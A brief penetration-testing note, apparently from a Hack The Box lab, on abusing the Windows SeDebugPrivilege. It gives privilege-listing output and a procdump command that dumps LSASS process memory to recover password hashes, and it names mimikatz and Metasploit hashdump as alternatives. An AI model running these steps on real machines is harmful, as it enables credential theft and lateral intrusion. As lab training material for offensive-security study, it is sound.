SeDebugPrivilege
We can abuse SeDebugPrivilege to dump the lsass and recover password hash from it.
C:\htb> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Now transfer procdump.exe on victim and dump the lsass
procdump.exe -accepteula -ma lsass.exe lsass.dmp
You can also use hashdump
module in metasploit or mimikatz to do the same task.
Last updated